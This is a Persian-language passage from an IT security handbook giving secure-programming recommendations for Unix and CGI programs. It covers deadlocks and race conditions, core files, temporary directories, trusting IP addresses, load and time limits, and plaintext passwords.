‫‪ .١٣‬ﺩﺭ ﻣﻮﺭﺩ ﺑﺮﻭﺯ ﺷﺮﺍﻳﻂ ﺭﻗﺎﺑﺖ‪ ٢٢١‬ﺩﺭ ﺑﺮﻧﺎﻣﻪ ﻫﻮﺷﻴﺎﺭ ﺑﺎﺷﻴﺪ‪ .‬ﺍﻳﻦ ﺷﺮﺍﻳﻂ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺷﻜﻞ ﺑﻦﺑﺴﺖ‪ ٢٢٢‬ﻭ ﻳـﺎ ﻳـﻚ ﻧـﺎﺗﻮﺍﻧﻲ ﺩﺭ ﺍﺟـﺮﺍﻱ‬
‫ﺻﺤﻴﺢ ﺩﻭ ﻓﺮﺍﺧﻮﺍﻧﻲ ﻧﺰﺩﻳﻚ ﺑﻪ ﻫﻢ ﺭﺥ ﺩﻫﺪ‪:‬‬

‫ﺷﺮﺍﻳﻂ ﺑﻦﺑﺴﺖ‬
‫ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﻣﻲﺩﺍﻧﻴﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭ ﺁﻥ ﻭﺍﺣﺪ ﺑﻴﺶ ﺍﺯ ﻳﻚ ﻧﺴﺨﻪ ﺍﺯ ﻳﻚ ﺑﺮﻧﺎﻣﻪ ﺩﺭﺣﺎﻝ ﺍﺟﺮﺍ ﺑﺎﺷﺪ ﻭ ﺑﻪ ﻫﻤﻴﻦ ﺩﻟﻴﻞ ﺑﻬﺘـﺮ ﺍﺳـﺖ‬
‫ﻫﺮ ﻓﺎﻳﻠﻲ ﻛﻪ ﻣﻲﺧﻮﺍﻫﻴﺪ ﺗﻐﻴﻴﺮ ﺩﻫﻴﺪ ﺭﺍ ﻗﻔﻞ ﻛﻨﻴﺪ‪ .‬ﺑﺮﺍﻱ ﺣﺎﻟﺘﻲ ﻛﻪ ﺑﺮﻧﺎﻣﻪ ﻳﻚ ﻓﺎﻳﻞ ﺭﺍ ﻗﻔﻞ ﻣﻲﻛﻨـﺪ ﻭ ﺳـﭙﺲ ﺍﺯ ﺣﺎﻓﻈـﻪ ﺑﻴـﺮﻭﻥ‬
‫ﺍﻧﺪﺍﺧﺘﻪ ﻣﻲﺷﻮﺩ‪ ،‬ﭼﺎﺭﻩﺍﻱ ﺑﺮﺍﻱ ﺑﺎﺯﺷﺪﻥ ﻗﻔﻞ ﻓﺎﻳﻞ ﺑﻴﺎﻧﺪﻳﺸﻴﺪ‪ .‬ﺍﺯ ﺑﺮﻭﺯ ﺑﻦﺑﺴﺖ ﻭ ﻳﺎ ﺷﺮﺍﻳﻄﻲ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺑﻦﺑﺴﺖ ﻣﻨﺠـﺮ ﺷـﻮﺩ‬
‫ﻼ ﻳﻚ ﺑﺮﻧﺎﻣﻪ ﺍﺑﺘﺪﺍ ﻓﺎﻳﻞ ‪ A‬ﺭﺍ ﺑﺮﺍﻱ ﺧﻮﺩ ﻗﻔﻞ ﻣﻲﻛﻨﺪ ﻭ ﺳﭙﺲ ﻣـﻲﺧﻮﺍﻫـﺪ‬ ‫ﺟﻠﻮﮔﻴﺮﻱ ﻛﻨﻴﺪ‪ .‬ﺍﻳﻦ ﺷﺮﺍﻳﻂ ﺯﻣﺎﻧﻲ ﭘﻴﺶ ﻣﻲﺁﻳﺪ ﻛﻪ ﻣﺜ ﹰ‬
‫ﻼ ﻓﺎﻳﻞ ‪ B‬ﺭﺍ ﻗﻔﻞ ﻛﺮﺩﻩ‪ ،‬ﻣﻲﺧﻮﺍﻫﺪ ﻓﺎﻳﻞ ‪ A‬ﺭﺍ ﻧﻴﺰ ﺑﺮﺍﻱ ﺧﻮﺩ ﻗﻔﻞ ﻛﻨﺪ‪.‬‬
‫ﻓﺎﻳﻞ ‪ B‬ﺭﺍ ﻗﻔﻞ ﻛﻨﺪ‪ ،‬ﻭ ﻫﻤﺰﻣﺎﻥ ﺑﺮﻧﺎﻣﺔ ﺩﻳﮕﺮﻱ ﻛﻪ ﻗﺒ ﹰ‬

‫ﺷﺮﺍﻳﻂ ﺭﻗﺎﺑﺖ‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫ﺑﻪ ﻳﺎﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﺑﺮﻧﺎﻣﺔ ﺷﻤﺎ ﺑﺼﻮﺭﺕ ﺑﺪﻭﻥ ﻭﻗﻔﻪ ﺍﺯ ﺍﺑﺘﺪﺍ ﺗﺎ ﺍﻧﺘﻬﺎ ﺍﺟﺮﺍ ﻧﻤﻲﺷﻮﺩ‪ ،‬ﺑﻠﻜـﻪ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﻣﻴـﺎﻥ ﺍﺟـﺮﺍﻱ ﻫـﺮ ﺩﻭ‬
‫ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻞ ﺑﺮﻧﺎﻣﻪ ﻭﻗﻔﺔ ﻛﻮﺗﺎﻫﻲ ﺍﻳﺠﺎﺩ ﺷﻮﺩ ﺗﺎ ﻗﺴﻤﺘﻲ ﺍﺯ ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﺩﻳﮕﺮ ‪ -‬ﺣﺘﻲ ﺷﺎﻳﺪ ﺑﺮﻧﺎﻣﻪﺍﻱ ﻛـﻪ ﺑﺨﻮﺍﻫـﺪ ﺩﺭ ﻛـﺎﺭ ﺑﺮﻧﺎﻣـﺔ‬
‫ﺷﻤﺎ ﺍﻳﺠﺎﺩ ﺍﺧﺘﻼﻝ ﻛﻨﺪ ‪ -‬ﺑﻪ ﺍﺟﺮﺍ ﺩﺭﺁﻳﺪ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﻣﺘﻦ ﺑﺮﻧﺎﻣﺔ ﺧـﻮﺩ ﺭﺍ ﺑـﺪﻗﺖ ﺑﺮﺭﺳـﻲ ﻛﻨﻴـﺪ ﺗـﺎ ﻣﻄﻤـﺌﻦ ﺷـﻮﻳﺪ ﺩﺭ ﺁﻥ ﻫـﻴﭻ ﺩﻭ‬
‫ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻞ ﻣﺘﻮﺍﻟﻲ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ ﻛﻪ ﺩﺭﺻﻮﺭﺕ ﺍﺟﺮﺍﻱ ﺩﺳﺘﻮﺭﺍﺕ ﺩﻟﺨﻮﺍﻩ ﻣﻴﺎﻥ ﺁﻧﺎﻥ ﺩﭼﺎﺭ ﺧﺮﺍﺑﻲ ﺷﻮﻧﺪ‪ .‬ﺑﻄﻮﺭ ﺧﺎﺹ ﻫﻨﮕﺎﻣﻴﻜﻪ ﭼﻨﺪ‬
‫ﻋﻤﻠﻴﺎﺕ ﺭﻭﻱ ﻳﻚ ﻓﺎﻳﻞ ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﻴﺪ )ﻣﺜ ﹰﻼ ﻣﺎﻟﻚ ﺁﻧﺮﺍ ﺗﻐﻴﻴﺮ ﻣﻲﺩﻫﻴﺪ‪ ،‬ﻓﺎﻳﻞ ﺭﺍ ﻣﺎﻧﺪﮔﺎﺭ ﻣﻲﻛﻨﻴﺪ‪ ،‬ﺣﺎﻟﺖ ﻓﺎﻳﻞ ﺭﺍ ﻋﻮﺽ ﻣﻲﻛﻨﻴﺪ‪ ،‬ﻭ‪ ،(...‬ﺍﺑﺘﺪﺍ ﻓﺎﻳﻞ‬
‫ﺭﺍ ﺑﺎﺯ ﻛﻨﻴﺪ ﻭ ﺳﭙﺲ ﺍﺯ ﻓﺮﺍﺧﻮﺍﻧﻴﻬﺎﻱ ﺳﻴﺴﺘﻤﻲ )(‪ ،fstat() ،fchown‬ﻭ )(‪ fchmod‬ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ‪ .‬ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﺑﺎﻋﺚ ﻣﻲﺷـﻮﺩ‬
‫ﻣﺎﺩﺍﻣﻴﻜﻪ ﺑﺮﻧﺎﻣﺔ ﺷﻤﺎ ﺷﻤﺎ ﺩﺭﺣﺎﻝ ﺍﺟﺮﺍ ﺍﺳﺖ‪ ،‬ﺑﺮﻧﺎﻣﺔ ﺩﻳﮕﺮﻱ ﻧﺘﻮﺍﻧﺪ ﺁﻥ ﻓﺎﻳﻞ ﺭﺍ ﺟﺎﻳﮕﺰﻳﻦ ﻛﻨﺪ‪ ،‬ﻭ ﺑﺪﻳﻦ ﺗﺮﺗﻴﺐ ﺍﺯ ﺑﺮﻭﺯ ﻳـﻚ ﺣﺎﻟـﺖ‬
‫ﻣﺤﺘﻤﻞ ﺭﻗﺎﺑﺖ ﺟﻠﻮﮔﻴﺮﻱ ﻛﺮﺩﻩﺍﻳﺪ‪ .‬ﻫﻤﭽﻨﻴﻦ ﺑﺮﺍﻱ ﻛﺴﺐ ﺁﮔﺎﻫﻲ ﺍﺯ ﺗﻮﺍﻧﺎﻳﻲ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﻳﻚ ﻓﺎﻳﻞ‪ ،‬ﺍﺯ ﺗـﺎﺑﻊ )(‪ access‬ﺍﺳـﺘﻔﺎﺩﻩ‬

‫‪220 "errno" Variable‬‬


‫‪221 Sequence Conditions‬‬
‫‪222 Deadlock‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٣٦٤‬‬

‫ﻧﻜﻨﻴﺪ‪ ،‬ﭼﺮﺍﻛﻪ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳﻦ ﺗﺎﺑﻊ ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﭘﺲ ﺍﺯ ﺁﻥ ﺍﺯ ﺗﺎﺑﻊ )(‪ open‬ﺍﺳﺘﻔﺎﺩﻩ ﺷﺪﻩ ﺑﺎﺷﺪ‪ ،‬ﻳﻜﻲ ﺍﺯ ﺣﺎﻻﺕ ﺷﻨﺎﺧﺘﻪﺷﺪﺓ ﺭﻗﺎﺑﺖ‬
‫ﺍﺳﺖ‪.‬‬
‫‪ .١٤‬ﺑﺮﻧﺎﻣﺔ ﺧﻮﺩ ﺭﺍ ﺟﺰ ﻫﻨﮕﺎﻡ ﺁﺯﻣﺎﻳﺶ ﺩﺭ ﺣﺎﻟﺘﻲ ﻗﺮﺍﺭ ﻧﺪﻫﻴﺪ ﻛﻪ ﻓﺎﻳﻠﻬﺎﻱ ‪ core‬ﺭﺍ ﺫﺧﻴﺮﻩ ﻛﻨﺪ‪ .‬ﻓﺎﻳﻠﻬـﺎﻱ ‪ core‬ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﻛـﻞ ﻳـﻚ‬
‫ﺩﻳﺴﻚ ﺭﺍ ﺍﺷﻐﺎﻝ ﻛﻨﻨﺪ‪ ،‬ﻭ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﻃﻼﻋﺎﺕ ﻣﺤﺮﻣﺎﻧﻪ ﺩﺭ ﺧﻮﺩ ﺫﺧﻴﺮﻩ ﻧﻤﺎﻳﻨﺪ‪ .‬ﺩﺭ ﺑﻌﻀﻲ ﻣﻮﺍﺭﺩ ﻣﻬﺎﺟﻢ ﺗﻨﻬﺎ ﺑﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳـﻦ‬
‫ﻧﻜﺘﻪ ﻛﻪ ﻳﻚ ﺑﺮﻧﺎﻣﻪ ﻓﺎﻳﻠﻬﺎﻱ ‪ core‬ﺭﺍ ﺫﺧﻴﺮﻩ ﻣﻲﻛﻨﺪ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﻳﻚ ﺳﻴﺴﺘﻢ ﻧﻔﻮﺫ ﻛﻨﺪ‪ .‬ﺑﺠـﺎﻱ ﺫﺧﻴـﺮﻩ ﻛـﺮﺩﻥ ﻓﺎﻳﻠﻬـﺎﻱ ‪core‬‬
‫ﺑﺮﻧﺎﻣﺔ ﺧﻮﺩ ﺭﺍ ﺑﮕﻮﻧﻪﺍﻱ ﺗﻨﻈﻴﻢ ﻛﻨﻴﺪ ﻛﻪ ﻣﺸﻜﻼﺕ ﺭﺍ ﺛﺒﺖ ﻛﻨﺪ ﻭ ﺍﺯ ﺑﺮﻧﺎﻣﻪ ﺧﺎﺭﺝ ﺷﻮﺩ‪ .‬ﺑﺮﺍﻱ ﺍﻳﻨﻜﻪ ﺣـﺪﺍﻛﺜﺮ ﺍﻧـﺪﺍﺯﺓ ﻓﺎﻳـﻞ ‪ core‬ﺭﺍ‬
‫"ﺻﻔﺮ" ﻗﺮﺍﺭ ﺩﻫﻴﺪ‪ ،‬ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﺗﺎﺑﻊ )(‪ setrlimit‬ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ‪.‬‬
‫‪ .١٥‬ﻓﺎﻳﻠﻬﺎﻱ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﺷﺎﺧﻪﻫﺎﻳﻲ ﻛﻪ ﻫﻤﻪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺩﺭ ﺁﻧﻬﺎ ﺑﻨﻮﻳﺴﻨﺪ ﺍﻳﺠﺎﺩ ﻧﻜﻨﻴﺪ‪ .‬ﺍﮔﺮ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﺔ ﺷﻤﺎ ﺑﺎﻳﺪ ﺑﺎ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﻛﺎﺭﺑﺮ‬
‫"‪ "nobody‬ﺑﻪ ﺍﺟﺮﺍ ﺩﺭ ﺁﻳﺪ‪ ،‬ﻛﺎﺭﺑﺮ ‪ nobody‬ﺭﺍ ﺑﻌﻨﻮﺍﻥ ﻣﺎﻟﻚ ﺷﺎﺧﻪﺍﻱ ﻛﻪ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪ ﻣﻲﺧﻮﺍﻫﺪ ﺩﺭ ﺁﻥ ﺑﻪ ﺍﻳﺠﺎﺩ ﻓﺎﻳﻠﻬـﺎ ﺑﭙـﺮﺩﺍﺯﺩ‬
‫ﻗﺮﺍﺭ ﺩﻫﻴﺪ‪ .‬ﺑﺮﺍﻱ ﻫﺮ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪ ﻭ ﻳﺎ ﺣﺪﺍﻗﻞ ﻫﺮ ﻣﺠﻤﻮﻋﺔ ﻣﺮﺗﺒﻂ ﻗﻄﻌـﻪﺑﺮﻧﺎﻣـﻪﻫـﺎ ﻛـﻪ ﺯﻳﺮﺳﻴـﺴﺘﻢ ﻧﺎﻣﻴـﺪﻩ ﻣـﻲﺷـﻮﻧﺪ‪ ،‬ﻓـﻀﺎﻳﻲ‬
‫ﺍﺧﺘﺼﺎﺻﻲ ﺑﺮﺍﻱ ﻓﺎﻳﻠﻬﺎﻱ ﻣﻮﻗﺘﻲ ﺗﻌﺒﻴﻪ ﻛﻨﻴﺪ )ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ‪ ،‬ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ ﻫﺮ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪ ﻳﻚ ﺷﺎﺧﺔ ﻣﺠﺰﺍ ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﻓﺎﻳﻠﻬﺎﻱ ﻣﻮﻗﺘﻲ ﺑﺪﻫﻴﺪ‪،‬‬
‫ﻭ ﻳﺎ ﻫﺮ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪ ﺭﺍ ﻣﻠﺰﻡ ﻛﻨﻴﺪ ﻛﻪ ﻓﺎﻳﻠﻬﺎﻱ ﻣﻮﻗﺘﻲ ﺧﻮﺩ ﺭﺍ ﻃﻮﺭﻱ ﻧﺎﻣﮕﺬﺍﺭﻱ ﻛﻨﺪ ﻛﻪ ﻫﻤﻪ ﺑﺎ ﻧﺎﻡ ﺧﻮﺩ ﺁﻥ ﻗﻄﻌﻪﺑﺮﻧﺎﻣـﻪ ﺷـﺮﻭﻉ ﺷـﺪﻩ ﺑﺎﺷـﻨﺪ(‪ .‬ﭼﻨﺎﻧﭽـﻪ‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻭﺏ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﻣﻴﺰﺑﺎﻥ ﻋﻤﻮﻣﻲ ﺑﺮﺍﻱ ﺗﻮﺍﺑﻊ ﭘﻮﺳﺘﺔ ‪ Unix‬ﻫﻢ ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ‪ ،‬ﻓﺎﻳﻠﻬـﺎﻱ ﻣـﻮﻗﺘﻲ ﺭﺍ ﺩﺭ ﺷـﺎﺧﺔ ‪/tmp‬‬
‫ﺫﺧﻴﺮﻩ ﻧﻨﻤﺎﻳﻴﺪ‪.‬‬
‫‪ .١٦‬ﺑﻪ ﺁﺩﺭﺱ ‪ IP‬ﺑﺴﺘﻪﻫﺎﻳﻲ ﻛﻪ ﺩﺭﻳﺎﻓﺖ ﻣﻲﻛﻨﻴﺪ ﺯﻳﺎﺩ ﺍﻋﺘﻤﺎﺩ ﻧﻜﻨﻴﺪ‪ .‬ﺍﻳﻦ ﺁﺩﺭﺳﻬﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻮﺳﻴﻠﺔ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﻩﻫـﺎﻱ ‪proxy‬‬
‫ﺟﻌﻞ‪ ،‬ﺩﺳﺘﻜﺎﺭﻱ‪ ،‬ﻭ ﻳﺎ ﺳﺮﻗﺖ ﺷﺪﻩ ﺑﺎﺷﻨﺪ‪.‬‬
‫‪ .١٧‬ﺩﺭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺧﻮﺩ ﻧﻮﻋﻲ ﺍﺯ ﺗﻘﺴﻴﻢ ﺑﺎﺭ‪ ٢٢٣‬ﻭ ﻳﺎ ﻣﺤﺪﻭﺩﻳﺖ ﺑﺎﺭ‪ ٢٢٤‬ﻗﺮﺍﺭ ﺩﻫﻴﺪ ﺗﺎ ﺑﺎﺭﮔﺬﺍﺭﻳﻬﺎﻱ ﺳﻨﮕﻴﻦ ﻫﻢ ﻗﺎﺑﻞ ﻣـﺪﻳﺮﻳﺖ ﺷـﻮﻧﺪ‪.‬‬
‫ﻼ ﻣﻲﺗﻮﺍﻧﻴﺪ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺧﻮﺩ ﺭﺍ ﻃﻮﺭﻱ ﺑﻨﻮﻳﺴﻴﺪ ﻛﻪ ﭘﻴﺶ ﺍﺯ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭﺁﻣﺪﻥ‪ ،‬ﻣﻴﺰﺍﻥ ﺑﺎﺭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺭﺍ ﻛﻨﺘـﺮﻝ ﻛﻨﻨـﺪ ﻭ‬‫ﻣﺜ ﹰ‬
‫ﭼﻨﺎﻧﭽﻪ ﻣﻘﺪﺍﺭ ﺁﻥ ﺍﺯ ﻳﻚ ﺳﻘﻒ ﺍﺯ ﭘﻴﺶ ﺗﻌﻴﻴﻦﺷﺪﻩ ﺑﻴﺸﺘﺮ ﺑﻮﺩ‪ ،‬ﺑﺎ ﻧﻤﺎﻳﺶ ﻳﻚ ﭘﻴﺎﻡ ﻣﺤﺘﺮﻣﺎﻧﻪ ﺑﻪ ﻛﺎﺭﺑﺮ ﺍﺯ ﺣﺎﻓﻈﻪ ﺧﺎﺭﺝ ﺷﻮﻧﺪ‪ .‬ﺍﻧﺠﺎﻡ‬
‫ﺍﻳﻨﻜﺎﺭ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﻣﻬﺎﺟﻤﻲ ﻛﻪ ﺑﺎ ﻓﺮﺍﺧﻮﺍﻧﻴﻬﺎﻱ ﻣﺘﻌﺪﺩ ﻳﻚ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪ ﺩﺭ ﺗﻼﺵ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﻳﻚ ﺣﻤﻠﺔ ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ ﻋﻠﻴﻪ‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺷﻤﺎ ﺍﺳﺖ ﺑﺎ ﺩﺷﻮﺍﺭﻱ ﺑﻴﺸﺘﺮﻱ ﺭﻭﺑﺮﻭ ﺷﻮﺩ‪ .‬ﺍﻳﻨﻜﺎﺭ ﻫﻤﭽﻨﻴﻦ ﺩﺭ ﺷﺮﺍﻳﻄﻲ ﻛﻪ ﺻﺪﻫﺎ ﻛﺎﺭﺑﺮ ﺑﺮﺍﻱ ﺳﺮﻳﻌﺘﺮ ﺍﺟﺮﺍ ﺷـﺪﻥ‬
‫ﻳﻚ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﺔ ﻛﹸﻨﺪ‪ ،‬ﺩﻛﻤﺔ ‪ reload‬ﺭﺍ ﻓﺸﺎﺭ ﻣﻲﺩﻫﻨﺪ‪ ،‬ﺍﺯ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺷﻤﺎ ﻣﺤﺎﻓﻈﺖ ﻣﻲﻛﻨﺪ‪.‬‬
‫‪ .١٨‬ﺑﺮﺍﻱ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺍﺟﺮﺍ ﺳﻘﻒ ﺯﻣﺎﻧﻲ ﻣﻨﺎﺳﺐ ﻭ ﻣﻌﻘﻮﻝ ﺗﻌﻴﻴﻦ ﻛﻨﻴﺪ‪ .‬ﺑﺮﻧﺎﻣﺔ ﺷﻤﺎ ﺑﻪ ﺩﻻﻳﻞ ﻣﺘﻌـﺪﺩﻱ ﻣـﻲﺗﻮﺍﻧـﺪ ﻣﺘﻮﻗـﻒ‬
‫ﻼ ﻣﻤﻜﻦ ﺍﺳﺖ ﻳﻚ ﺩﺭﺧﻮﺍﺳﺖ ﺧﻮﺍﻧﺪﻥ ﺍﺯ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺭﺍﻩ ﺩﻭﺭ ﺑﻲﺟﻮﺍﺏ ﺑﻤﺎﻧـﺪ‪ ،‬ﻳـﺎ ﻳـﻚ ﻣﺮﻭﺭﮔـﺮ ﻭﺏ ﺍﺯ ﻗﺒـﻮﻝ‬ ‫ﮔﺮﺩﺩ؛ ﻣﺜ ﹰ‬
‫ﻛﺮﺩﻥ ﺍﻃﻼﻋﺎﺕ ﺍﺭﺳﺎﻝﺷﺪﻩ ﺍﺯ ﻃﺮﻑ ﺷﻤﺎ ﺍﻣﺘﻨﺎﻉ ﻭﺭﺯﺩ‪ .‬ﻳﻚ ﺭﻭﺵ ﺳﺎﺩﻩ ﺑﺮﺍﻱ ﺣﻞ ﺍﻳﻦ ﺩﻭ ﻣـﺸﻜﻞ ﺁﻥ ﺍﺳـﺖ ﻛـﻪ ﺑـﺮﺍﻱ ﺯﻣﺎﻧﻴﻜـﻪ‬
‫ﻗﻄﻌﻪﺑﺮﻧﺎﻣﺔ ‪ CGI‬ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﻣﻨﺎﺑﻊ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ ﻣﺤﺪﻭﺩﻳﺖ ﻗﺮﺍﺭ ﺩﻫﻴﺪ‪ .‬ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﺑﻪ ﻣﺤـﺾ ﺍﻳﻨﻜـﻪ ﺑﺮﻧﺎﻣـﻪ ﺍﺯ‬
‫ﺳﻘﻒ ﺯﻣﺎﻧﻲ ﺗﻌﻴﻴﻦﺷﺪﻩ ﺗﺠﺎﻭﺯ ﻛﻨﺪ‪ ،‬ﺑﺎﻳﺪ ﻓﻀﺎﻱ ﺣﺎﻓﻈﻪ ﺭﺍ ﺧﺎﻟﻲ ﻛﻨـﺪ ﻭ ﺍﺯ ﺁﻥ ﺧـﺎﺭﺝ ﺷـﻮﺩ‪ .‬ﺩﺭ ﺑﻴـﺸﺘﺮ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﻧـﻮﻳﻦ ﺑـﺮﺍﻱ‬
‫ﺑﺮﻗﺮﺍﺭﻱ ﺍﻳﻦ ﻣﺤﺪﻭﺩﻳﺘﻬﺎﻱ ﺯﻣﺎﻧﻲ ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﻧﻮﻋﻲ ﻓﺮﺍﺧﻮﺍﻧﻲ ﺗﺎﺑﻌﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ‪.‬‬
‫‪ .١٩‬ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﺓ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﻫﺎﻱ ‪ CGI‬ﺩﺭﺣﺎﻝ ﺍﺟﺮﺍﻱ ﺧﻮﺩ ﺍﺯ ﺭﻳﺰﭘﺮﺩﺍﺯﻧﺪﻩ‪ ،‬ﻣﺤﺪﻭﺩﻳﺘﻬﺎﻱ ﻣﻌﻘﻮﻝ ﻭ ﻣﻨﻄﻘﻲ ﻗﺮﺍﺭ ﺩﻫﻴﺪ‪ .‬ﻳـﻚ ﺍﺷـﻜﺎﻝ‬
‫ﺟﺰﺋﻲ ﺩﺭ ﻳﻚ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﺔ ‪ CGI‬ﻣﻤﻜﻦ ﺍﺳﺖ ﺁﻧﺮﺍ ﺩﺭ ﻳﻚ ﺣﻠﻘﺔ ﺑﻴﻨﻬﺎﻳﺖ ﻗﺮﺍﺭ ﺩﻫﺪ‪ .‬ﺑﺮﺍﻱ ﻣﺤﺎﻓﻈﺖ ﺍﺯ ﻛﺎﺭﺑﺮﺍﻥ ﻭ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ‬
‫ﻭﺏ ﺩﺭ ﻣﻘﺎﺑﻞ ﺍﻳﻦ ﺍﺣﺘﻤﺎﻝ‪ ،‬ﺑﺎﻳﺪ ﺑﺮﺍﻱ ﻣﺠﻤﻮﻉ ﺯﻣـﺎﻧﻲ ﻛـﻪ ﻗﻄﻌـﻪﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ ‪ CGI‬ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺍﺯ ﺭﻳﺰﭘﺮﺩﺍﺯﻧـﺪﻩ ﻣـﺼﺮﻑ ﻛﻨﻨـﺪ‪،‬‬
‫ﻣﺤﺪﻭﺩﻳﺘﻬﺎﻱ ﺳﻔﺖ ﻭ ﺳﺨﺘﻲ ﻗﺮﺍﺭ ﺩﺍﺩ‪.‬‬
‫‪ .٢٠‬ﺍﺯ ﻛﺎﺭﺑﺮ ﻧﺨﻮﺍﻫﻴﺪ ﻛﻪ ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺧﻮﺩ ﻳﻚ ﺭﻣﺰ ﻋﺒﻮﺭ ﻗﺎﺑﻞ ﺍﺳﺘﻔﺎﺩﺓ ﻣﺠﺪﺩ ﺭﺍ ﺩﺭ ﻗﺎﻟﺐ ﻣﺘﻦﺳﺎﺩﻩ ﺭﻭﻱ ﺷﺒﻜﻪ ﺑﻔﺮﺳﺘﺪ‪ .‬ﺍﮔـﺮ‬
‫ﺍﺯ ﺷﻨﺎﺳﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﺪ‪ ،‬ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻭﺏ ﺑﺎ ﻗﺎﺑﻠﻴﺖ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺭﺍ ﺑﻜﺎﺭ ﺑﺮﻳﺪ ﺗﺎ ﺭﻣـﺰ ﻋﺒـﻮﺭ‬

‫‪223 Load Shedding‬‬


‫‪224 Load Limiting‬‬
‫‪٣٦٥‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﺩﺭ ﻗﺎﻟﺐ ﻣﺘﻦﺳﺎﺩﻩ ﻣﻨﺘﻘﻞ ﻧﺸﻮﺩ‪ .‬ﻫﻤﭽﻨﻴﻦ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﺭﺍﻩ ﺟﺎﻳﮕﺰﻳﻦ ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﺑـﺮﺍﻱ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ ﺍﺯ ﮔـﻮﺍﻫﻲﻫـﺎﻱ ﺳـﻤﺖ‬
